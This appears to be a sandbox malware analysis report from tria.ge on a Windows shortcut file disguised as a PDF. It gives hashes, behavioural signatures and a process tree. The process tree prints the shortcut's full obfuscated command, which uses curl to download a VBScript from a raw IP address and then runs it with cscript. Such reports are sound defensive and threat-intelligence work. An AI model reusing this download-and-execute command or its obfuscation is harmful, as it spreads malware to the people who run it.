Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/10/2023, 04:27

General

  • Target

    Fresh Mission and Core Values.pdf.lnk

  • Size

    2KB

  • MD5

    cea0885964c5c18fd7410ca82e0da52e

  • SHA1

    272151f1e4f39fd79457dc3f1538103f153c5bf8

  • SHA256

    e69a776549f8c3e68d4729dde9a1679f633d230bca21b6a2144dfd5599269d6e

  • SHA512

    3e0c9105e096d880750f43f3fd2e2b15b917a7e5c616367b16b16761b43065584238038d9bf9012c8b8227558d97c321268f299eba2c29227fd8ea5dc7a7c5e0

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Fresh Mission and Core Values.pdf.lnk"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1672
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c kdYh || EchO kdYh & p"in"G kdYh || cU"Rl" http://185.39.18.170/3q/4F9 -o C:\Users\Admin\AppData\Local\Temp\kdYh.vbs & p"in"G -n 3 kdYh || C"sC"R"iPT" C:\Users\Admin\AppData\Local\Temp\kdYh.vbs & eXit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3820
      • C:\Windows\system32\PING.EXE
        p"in"G kdYh
        3⤵
        • Runs ping.exe
        PID:1436
      • C:\Windows\system32\curl.exe
        cU"Rl" http://185.39.18.170/3q/4F9 -o C:\Users\Admin\AppData\Local\Temp\kdYh.vbs
        3⤵
          PID:3444
        • C:\Windows\system32\PING.EXE
          p"in"G -n 3 kdYh
          3⤵
          • Runs ping.exe
          PID:3400
        • C:\Windows\system32\cscript.exe
          C"sC"R"iPT" C:\Users\Admin\AppData\Local\Temp\kdYh.vbs
          3⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:100
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe"
            4⤵
              PID:4516

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\kdYh.vbs

        Filesize

        1KB

        MD5

        c4a8d81a73bc508196aced6725f854a3

        SHA1

        d9970f285539d2f55df5dfba815042d37f16a78e

        SHA256

        a8f83ce806fe76f2ec67479eadb5985125d274e1fe9bb8dce943360414da9fc0

        SHA512

        dd7e3a7b2a301b58ff9615bdeaf3606929a06979bbaba25c7914d565abdef6410ca78665df788783ee2c2a2f083962fc8bc09337a5fd584091eb83131722a641